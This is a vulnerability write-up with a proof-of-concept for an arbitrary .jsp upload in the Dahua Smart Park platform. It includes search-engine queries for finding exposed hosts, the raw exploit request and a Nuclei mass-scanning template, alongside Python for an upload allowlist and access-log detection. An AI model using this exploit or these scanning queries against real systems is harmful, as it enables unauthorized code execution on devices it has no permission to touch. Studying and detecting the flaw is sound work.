Dahua Smart Park Integrated Management Platform (大华智慧园区综合管理平台) devicePoint_addImgIco arbitrary file upload vulnerability

Vulnerability overview

The Dahua Smart Park Integrated Management Platform is a management platform that covers park operations, resource allocation and smart services. It is meant to help optimize how park resources are allocated, meet varied management needs and improve the user experience through smart services. The platform exposes a file upload function that does not strictly restrict or filter the type, size, format or storage path of uploaded files. An attacker can therefore craft a malicious file (in the POC below, a .jsp file) and upload it to the device, where it lands in a web-reachable directory.

Reproduction

FOFA query: "/WPMS/asset/lib/gridster/"app="dahua-智慧园区综合管理平台"
Hunter (鹰图) query: web.body="/WPMS/asset/lib/gridster/"
The login page looks like this:
[screenshot of the login page]

POC:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: IP
Content-Length: 226
Expect: 100-continue
Connection: close

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--


Accessing the uploaded file: the server stores the upload under a name of its own (not the a.jsp that was sent) but keeps the .jsp extension, so the file remains reachable and executable from the web root. In the run above it was stored at:
/upload/emap/society_new/ico_res_ffe925764fee_on.jsp
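As an added example (not code from the original post or from Dahua), the Python below does three things around the request above: it builds the POC's multipart body byte for byte so the Content-Length is computed instead of copied, it shows the extension allowlist the icon upload handler should have enforced, and it scans a few constructed access-log lines for the upload-then-fetch sequence this write-up describes. The endpoint, boundary, filename and storage directory are taken from the POC; the image allowlist, the log format and the sample log lines are assumptions made for the example.

```python
"""Added example, not from the original post: build the POC request, the
server-side check that was missing, and a log scan for the resulting traffic."""
import re

BOUNDARY = "f3aeb22be281d77542546a2f71e20982"   # boundary used in the POC
UPLOAD_PATH = "/emap/devicePoint_addImgIco"      # vulnerable endpoint (POC)
STORE_DIR = "/upload/emap/society_new/"          # where the file landed (POC)
# An icon upload should only accept image formats. The exact list the vendor
# intended is not known; this allowlist is an assumption for the example.
ICON_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "ico", "bmp"}


def build_multipart(filename: str, content: bytes, boundary: str = BOUNDARY) -> bytes:
    """multipart/form-data body with one 'upload' part, CRLF line endings and no
    CRLF after the closing boundary; for a.jsp + 10 bytes this is the POC's 226."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="upload"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "Content-Transfer-Encoding: binary\r\n"
        "\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--".encode()


def build_request(host: str, filename: str, content: bytes) -> bytes:
    """Full HTTP/1.1 request; Content-Length is derived from the body."""
    body = build_multipart(filename, content)
    headers = (
        f"POST {UPLOAD_PATH}?hasSubsystem=true HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return headers.encode() + body


def safe_icon_filename(filename: str) -> bool:
    """What the server should check before storing: a bare basename (no path
    separators, no NUL) whose LAST extension is an allowlisted image type, so
    'a.jsp' and 'x.png.jsp' are both rejected."""
    if not filename or any(c in filename for c in "/\\\x00"):
        return False
    stem, dot, ext = filename.rpartition(".")
    return bool(stem) and dot == "." and ext.lower() in ICON_EXTENSIONS


# Common log format, assumed for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (ip, kind, path) findings. A POST to the endpoint is recorded as
    'upload_post'; a 200 for a non-image file under STORE_DIR is 'script_fetched',
    escalated to 'upload_then_execute' when the same client posted earlier."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        path_only = path.split("?", 1)[0]
        if method == "POST" and path_only == UPLOAD_PATH:
            uploaders.add(ip)
            findings.append((ip, "upload_post", path_only))
        elif path_only.startswith(STORE_DIR) and status == "200":
            if not safe_icon_filename(path_only[len(STORE_DIR):]):
                kind = "upload_then_execute" if ip in uploaders else "script_fetched"
                findings.append((ip, kind, path_only))
    return findings


# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Aug/2023:09:39:01 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 25',
    '10.0.0.5 - - [29/Aug/2023:09:39:02 +0800] "GET /upload/emap/society_new/ico_res_ffe925764fee_on.jsp HTTP/1.1" 200 11',
    '10.0.0.9 - - [29/Aug/2023:09:40:10 +0800] "GET /upload/emap/society_new/ico_res_0123456789ab_on.png HTTP/1.1" 200 2048',
    '10.0.0.9 - - [29/Aug/2023:09:40:11 +0800] "GET /WPMS/asset/lib/gridster/jquery.gridster.min.js HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    print(build_request("IP", "a.jsp", b"h4jc4K1lT4").decode())
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The Expect: 100-continue header from the POC is left out on purpose; it is not needed for the upload. A legitimate icon upload also produces an upload_post record, so on its own that event is only context; the fetch of a non-image name from the storage directory is what makes the pair worth an alert.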

Nuclei template for batch scanning

id: Dahua_devicePoint_addImgIco_upload
info:
  name: Dahua Smart Park Integrated Management Platform devicePoint_addImgIco arbitrary file upload
  author: mhb17
  severity: critical
  description: Dahua Smart Park Integrated Management Platform (大华智慧园区综合管理平台) devicePoint_addImgIco arbitrary file upload vulnerability
  reference:
    - https://
  tags: fileupload
http:
  - raw:
      - |-
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Content-Length: 226
        Expect: 100-continue
        Connection: close

        --f3aeb22be281d77542546a2f71e20982
        Content-Disposition: form-data; name="upload"; filename="b.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        h4jc4K1lT4
        --f3aeb22be281d77542546a2f71e20982--
    matchers:
      - type: word
        part: body
        words:
          - '"code":1'
Posted 2023-08-29 09:39 by 学安全的小白